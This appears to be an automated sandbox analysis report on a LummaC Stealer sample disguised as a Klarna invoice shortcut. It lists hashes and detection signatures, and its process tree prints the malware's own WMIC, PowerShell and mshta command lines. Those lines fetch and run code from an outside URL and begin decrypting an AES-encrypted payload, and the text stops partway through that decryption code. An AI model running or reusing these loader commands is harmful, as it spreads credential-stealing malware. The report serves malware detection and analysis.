Edit tour
Windows
Analysis Report
KlarnaInvoice229837.pdf.lnk
Overview
General Information
| Sample name: | KlarnaInvoice229837.pdf.lnk |
| Analysis ID: | 1575736 |
| MD5: | da28a682053a47872919a14d25e98598 |
| SHA1: | ab0f8eb3dd79555ed426f70fee752fe037e74fa5 |
| SHA256: | f830850a900edc87a76adfafb59fe18b33426bad84478cb1c6a6392f582b4c78 |
| Tags: | CHEgeolnkLummaStealeruser-abuse_ch |
| Infos: |   |
 | |
Detection
LummaC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to create processes via WMI
Creates processes via WMI
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
WMIC.exe (PID: 4348 cmdline: "C:\Window s\System32 \Wbem\wmic .exe" proc ess call c reate "pow ershell -w 1 . \W*\S *2\m*ht*e https://na ubeautylus .ch/Header frontend" MD5: C37F2F4F4B3CD128BDABCAEB2266A785) 
conhost.exe (PID: 3752 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 5544 cmdline: powershell -w 1 . \W *\S*2\m*ht *e https:/ /naubeauty lus.ch/Hea derfronten d MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
mshta.exe (PID: 6960 cmdline: "C:\Window s\System32 \mshta.exe " https:// naubeautyl us.ch/Head erfrontend MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 1344 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop $dd g = '474A3 D80681E00D 6A2EF8CD92 05A8000631 C5C73110F4 F3F98F9A33 80757A5658 7AC33C982B 8757EDE337 D31FE178A5 C76E820250 B09678E60E 099A6640F0 003AD5BA58 0D4079FF31 BFB3624F99 36FF7E054A 6F5E6ADF16 AF70F2E258 B230F0E119 433E36E3EA 1E08ACE300 686446DBFF A1718086C8 74FC8A8A09 ECE0BFD582 7E2193AF83 B13A948421 3EC696E93E AD4E5C86D3 B340D0383D F19D9C6B91 77B473A715 691E727DD5 9FAD481BB4 9CFEA164A8 C8A2491D76 7B90BD1F1A 11FC199A39 158AB0C738 65F35115CB BE29DBEC48 8B90B0DC06 1AD5039FE4 14583BD0E8 BD4E7B7672 D629DE366D BFAED2D288 3ABA50A9A3 E095A1B267 77F10398DF 92E050D286 E806395A56 48C371F95E 62603829AB 9CCCACC87B A02D01A00A FE9838ECF6 6997E0A551 A83FFD859B BA6E2E568E 9EDF081936 A8569161CB 274B3B9FC2 1427BBFF2D 5D3CF50087 2D4A683668 F2BA8C3038 B93718EE83 17DBCCA630 5CD634DD1B 2335210DC7 03C66A2F0B 81A0128C9E 257E324E61 A18DA3ABFD 1FF42A8E1E 1E8F1E7A7E 412839AAE3 5575C1AB8B 6072F3F101 F284610A7A 9532CE85C5 97BD62A5F4 DEB11490AF 74CF21ECB3 96C3208FB1 E2589B5CE2 09FFE1017B D9C5FAECDA 99ACB77A24 3D50657551 D5D47F459F 8E119B1065 3DCCB3289C 76C9277136 D22F53A691 99D62D4FFD 4041CF72E1 A171243BD2 074D940A15 228E8513CE 7A56D65D8E C952DA1892 A1C0DD3226 7424040F32 729D596424 618D14BC57 78CA69A50F 5378CE90DD 67BF9999C5 30599FA84E EDF1437CAD 4599F3B7A5 E7C715AF39 F96B02950C 66C2C6BA86 E0CA9B675D 12FDB08769 2B5AAB0023 D114DDA9F4 06E075D82E BF2F19297D 6F614E1721 4DB113946B 455BD69B36 718F5E9FDD 59B17F24AD E82623F8E0 2D3779A8A6 8B9AD01E42 9B87EFA6E7 5E2447F091 1F56F9765C 959A678DCB 2037D736BE 2BEBFAA18D 5CD0E5D315 18F484AA55 F2B977C501 125F808030 41206588BA DA41525EE9 B8028EA587 81C70961A6 BB0694F09D A35A160ED1 AE70FB8C2E 6354A6F03B FC8C02611C 83AD609171 71564EB342 465A947A75 C12850F40B 68C68DF9C5 D83328A987 98B17DBEA5 19B0CE3985 0F7D8E3905 84FED55BE5 059CA71D27 19A0D9B357 5AD4DA7287 E4D5C5F7EF BA6CC3A3F7 F4BCD13AC1 249B159691 B69F1D6463 8B49A4BB7A 28DA57B778 92D7E8F00A 1D56280ACF 19657E31A6 6DFC23FBA5 0CFDA53B25 280E96E1FB F839A92239 1F2D69B183 9C42256893 5D9A35EB45 649512E2FD FF02BB4169 51E3F12318 3CA94CCFCC B683F885C2 8A6612BE81 855A88151A 9D947C889D F4B8536261 DCAAD58C91 1647AB6B0D 09AAE2E7F0 815EF18901 24C736FB15 0D2551F041 9A04AA7E0C 0AA8A883CD 43E6C794BC ACCAFBDC6C EA95B925F0 72D8EC8D52 F266541A22 E74F87228F 055F2EC79D E196F94BD5 C59D029B13 20B41AAF44 D624365A3C 1EC5F6B716 D4A5759484 74E4552594 C66474E';f unction cZ F ($PgTDvw wB){return -split ($ PgTDvwwB - replace '. .', '0x$& ')};$kvsOm I = cZF($d dg.SubStri ng(0, 2080 ));$qlR = [System.Se curity.Cry ptography. Aes]::Crea te();$qlR. Key = cZF( $ddg.SubSt ring(2080) );$qlR.IV = New-Obje ct byte[]